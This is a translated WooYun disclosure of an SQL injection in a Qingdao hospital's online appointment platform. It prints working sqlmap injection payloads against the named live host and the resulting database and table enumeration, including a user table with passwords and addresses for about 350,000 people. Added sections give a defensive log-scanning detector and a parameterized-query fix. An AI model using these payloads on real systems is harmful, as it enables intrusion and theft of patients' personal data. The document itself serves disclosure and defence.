Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144010

Title: A municipal hospital's online appointment platform has a SQL injection that exposes 350,000 users' information (phone number / gender / account password / address / appointment orders, etc.)

Affected vendor: qingdaonews.com

Author: 路人甲

Submitted: 2015-09-29 10:35

Fix time: 2015-10-12 19:36

Published: 2015-10-12 19:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:

Bookmarks: 4


Vulnerability details

Disclosure status:

2015-09-29: Details were sent to the vendor and are awaiting the vendor's handling
2015-10-12: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As titled.

Detailed description:

Vulnerable URL:

http://guahao.qingdaonews.com/YyYisheng/index/keyword/a*.html

The search function is injectable:

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://guahao.qingdaonews.com:80/YyYisheng/index/keyword/a'||(SELECT 'WzEV' FROM DUAL WHERE 7222=7222 RLIKE (SELECT (CASE WHEN (6650=6650) THEN 0x61 ELSE 0x28 END)))||'.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://guahao.qingdaonews.com:80/YyYisheng/index/keyword/a'||(SELECT 'iTtQ' FROM DUAL WHERE 5753=5753 AND (SELECT 2866 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(2866=2866,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'.html
---
[22:52:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL 5.0
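The sqlmap output above shows the shape of the probes that reached the search route: a single quote that closes the keyword literal, followed by a subquery. As an added example, not code from the report or from the vendor, the following Python scanner reads constructed Nginx access-log lines (the fingerprint above says the site runs Nginx) and flags request paths where a closing quote is followed by SQL constructs. The log format, IP addresses and the sample paths are constructed for this demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the report). Lines 3 and 4
# mimic the shape of the boolean-based and error-based probes shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Sep/2015:22:50:01 +0800] "GET /YyYisheng/index/keyword/a.html HTTP/1.1" 200 5120
10.0.0.5 - - [29/Sep/2015:22:50:03 +0800] "GET /YyYisheng/index/keyword/%E5%86%85%E7%A7%91.html HTTP/1.1" 200 6100
10.0.0.9 - - [29/Sep/2015:22:52:27 +0800] "GET /YyYisheng/index/keyword/a'||(SELECT%20'WzEV'%20FROM%20DUAL%20WHERE%207222=7222)||'.html HTTP/1.1" 200 5120
10.0.0.9 - - [29/Sep/2015:22:52:28 +0800] "GET /YyYisheng/index/keyword/a'||(SELECT%201%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)||'.html HTTP/1.1" 500 312
"""

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Each indicator is one SQL construct; a quote followed by an operator or a
# closing parenthesis is the "literal break" that every probe above relies on.
INDICATORS = {
    "quote_break": re.compile(r"'\s*(?:\|\||or\b|and\b|\))", re.I),
    "select": re.compile(r"\bselect\b", re.I),
    "from_dual": re.compile(r"\bfrom\s+dual\b", re.I),
    "info_schema": re.compile(r"information_schema\.", re.I),
    "rlike": re.compile(r"\brlike\b", re.I),
    "case_when": re.compile(r"\bcase\s+when\b", re.I),
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
}


def parse_line(line):
    """Return the fields of one log line with the path URL-decoded, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])  # decode %20 etc. before matching
    return rec


def classify(path):
    """Return (suspicious, matched indicator names) for a decoded request path."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(path)]
    # Require the literal break plus at least one SQL construct to keep noise
    # from ordinary search terms that happen to contain an apostrophe.
    suspicious = "quote_break" in hits and len(hits) >= 2
    return suspicious, hits


def scan(log_text):
    """Scan raw log text and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        suspicious, hits = classify(rec["path"])
        if suspicious:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "status": rec["status"], "hits": hits})
    return findings


def count_by_source(findings):
    """Aggregate findings per client IP; bursts from one address are typical of a scanner."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["status"], ",".join(f["hits"]))
    print(count_by_source(found))
```

The scanner decodes the path before matching, since the probes arrive percent-encoded, and it reports the HTTP status alongside each hit: a run of 500 responses from one address against a route that normally returns 200 is the error-based phase of exactly the kind of enumeration shown in the output above.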

Proof of vulnerability:

Databases:

(screenshot: dbs.png)

Detailed information on 350,000 users: account passwords, gender, addresses, postal codes, and so on, plus more than a million order records.

Database: qd_guahao
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| gh_czjilu | 738765 |
| order_extend | 583381 |
| user_order_1314 | 467246 |
| gh_error | 415887 |
| user_message | 396910 |
| gh_user | 352610 |
| te_mobile | 312228 |
| user_order | 298907 |
| jb_views | 195963 |
| user_order_201501_05 | 175184 |
| user_friend | 46855 |
| user_pingjia | 16339 |
| jb_symtodis | 7262 |
| bank_record | 4144 |
| yy_yisheng | 3656 |
| qy_stopsend | 3397 |
| jb_parttodis | 3344 |
| jb_disease | 2390 |
| yy_news | 1755 |
| yy_month | 1744 |
| yy_keshi | 1002 |
| gh_messstat | 1000 |
| qy_stops | 914 |
| ys_outsys | 752 |
| yy_doctodis | 711 |
| jb_symptom | 574 |
| gh_problem | 499 |
| jb_sympart | 461 |
| gh_keshi | 272 |
| gh_ceping | 168 |
| gh_main | 160 |
| gh_yiyuan | 58 |
| gh_phoner | 23 |
| gh_gonggao | 22 |
| jb_part | 22 |
| gh_adrole | 9 |
| order_deal | 6 |
| ask_mess | 5 |
| ask_messback | 2 |
| gh_config | 1 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ec_bill_country | 3232 |
| ec_cvcolumnlist | 739 |
| ec_picklist | 540 |
| ec_cvadvfilter | 345 |
| ec_parenttabrel | 324 |
| ec_cvadvfilterfenzu | 305 |
| ec_field | 191 |
| ec_def_org_field | 173 |
| ec_loginhistory | 144 |
| ec_cvstdfilter | 69 |
| ec_cvstdfilterfenzu | 61 |
| ec_blocks | 60 |
| ec_customview | 43 |
| ec_fenzu | 26 |
| ec_modulelist | 24 |
| ec_crmentity | 22 |
| ec_entityname | 16 |
| ec_tab | 14 |
| ec_appkey_seq | 12 |
| ec_customfield_sequence_seq | 12 |
| ec_fenzu_seq | 12 |
| ec_field_seq | 12 |
| ec_loginhistory_seq | 12 |
| ec_mailids_seq | 12 |
| ec_maillists_seq | 12 |
| ec_maillogs_seq | 12 |
| ec_mailsets_seq | 12 |
| ec_memdayconfig_seq | 12 |
| ec_messageaccounttmpslogs_seq | 12 |
| ec_multifield_seq | 12 |
| ec_picklist_seq | 12 |
| ec_productfieldlist_seq | 12 |
| ec_qunfas_seq | 12 |
| ec_relatedlists_seq | 12 |
| ec_selectquery_seq | 12 |
| ec_sendsmsbox_seq | 12 |
| ec_smslogs_seq | 12 |
| ec_systems_seq | 12 |
| ec_users_seq | 12 |
| ec_relatedlists | 9 |
| ec_account | 8 |
| ec_users | 6 |
| ec_crmentity_seq | 4 |
| ec_maillists | 4 |
| ec_notes | 4 |
| ec_maillogs | 3 |
| ec_parenttab | 3 |
| ec_maillisttmps | 2 |
| ec_multifield | 2 |
| ec_productfieldlist | 2 |
| ec_products | 2 |
| ec_bill_country_seq | 1 |
| ec_contacts | 1 |
| ec_customview_seq | 1 |
| ec_inventoryproductrel | 1 |
| ec_memdayconfig | 1 |
| ec_message | 1 |
| ec_queue | 1 |
| ec_queuemessage | 1 |
| ec_qunfatmps | 1 |
| ec_salesorder | 1 |
| ec_smslogs | 1 |
| ec_systems | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1477 |
| STATISTICS | 293 |
| GLOBAL_STATUS | 292 |
| SESSION_STATUS | 292 |
| SESSION_VARIABLES | 291 |
| GLOBAL_VARIABLES | 282 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| PARTITIONS | 165 |
| TABLES | 165 |
| KEY_COLUMN_USAGE | 114 |
| TABLE_CONSTRAINTS | 104 |
| CHARACTER_SETS | 39 |
| SCHEMA_PRIVILEGES | 18 |
| PLUGINS | 14 |
| ENGINES | 5 |
| SCHEMATA | 4 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


The user table:

Database: qd_guahao
Table: gh_user
[23 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| user_address | varchar(255) |
| user_email | varchar(30) |
| user_fav_ys | varchar(255) |
| user_fav_yy | tinyint(1) unsigned |
| user_id | int(11) unsigned |
| user_ip | varchar(15) |
| user_messages | int(8) unsigned |
| user_mobile | varchar(11) |
| user_mobile_yz | tinyint(1) unsigned |
| user_pass | varchar(18) |
| user_pass2 | varchar(4) |
| user_password | varchar(32) |
| user_password2 | varchar(3) |
| user_realname | varchar(10) |
| user_sex | varchar(2) |
| user_status | tinyint(1) |
| user_time | int(11) unsigned |
| user_type | tinyint(1) |
| user_ybkh | varchar(12) |
| user_ybkl | tinyint(1) unsigned |
| user_youbian | varchar(6) |
| user_yywg | int(11) unsigned |
| user_yywg_lj | int(4) unsigned |
+----------------+---------------------+


(screenshot: 1.png)

Fix recommendation:
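The report leaves this section empty. As an added example, not from the author or the vendor, the following Python script contrasts the flawed pattern behind this finding (the keyword from the URL spliced into a LIKE clause) with a parameterized query, using an in-memory SQLite table as a stand-in for the MySQL backend. The table name yy_yisheng is taken from the listing above; its columns and rows are constructed for this demonstration, and the same fix applies verbatim to PDO prepared statements in PHP.

```python
import sqlite3


def make_db():
    """Build a constructed doctor table; columns are assumed, not from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE yy_yisheng (ys_id INTEGER PRIMARY KEY, ys_name TEXT, ys_keshi TEXT)")
    conn.executemany(
        "INSERT INTO yy_yisheng (ys_name, ys_keshi) VALUES (?, ?)",
        [("Li Wei", "cardiology"), ("Zhang Min", "neurology"), ("Wang Fang", "pediatrics")],
    )
    return conn


def search_vulnerable(conn, keyword):
    """Hypothetical reconstruction of the flaw: the URL keyword is concatenated into SQL."""
    sql = "SELECT ys_id, ys_name FROM yy_yisheng WHERE ys_name LIKE '%" + keyword + "%'"
    return conn.execute(sql).fetchall()


def escape_like(s):
    """Backslash-escape LIKE metacharacters so input cannot widen the pattern."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, keyword):
    """Hardened form: the keyword is bound as a parameter and LIKE wildcards are escaped.

    Bound parameters are sent separately from the SQL text, so a quote in the
    keyword can never terminate the literal; the ESCAPE clause makes % and _
    in user input match themselves instead of acting as wildcards.
    """
    sql = "SELECT ys_id, ys_name FROM yy_yisheng WHERE ys_name LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escape_like(keyword) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR 1=1 -- "  # closes the literal, exactly as the report's payloads do
    print("vulnerable, normal keyword:", search_vulnerable(db, "Li"))
    print("vulnerable, quote-breaking keyword:", search_vulnerable(db, probe))
    print("safe, quote-breaking keyword:", search_safe(db, probe))
    print("safe, bare wildcard:", search_safe(db, "%"))
```

With the concatenated query the quote-breaking keyword returns every row; with the bound parameter it returns nothing, because the whole string is searched for literally. Escaping the wildcards is a separate, smaller point: it is not an injection, but without it a keyword of `%` alone dumps the entire table through a perfectly "safe" prepared statement.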

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability responses

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-10-12 19:36

Vendor reply:

Vulnerability Rank: 20 (WooYun assessment)

Latest status:

2015-10-12: Very serious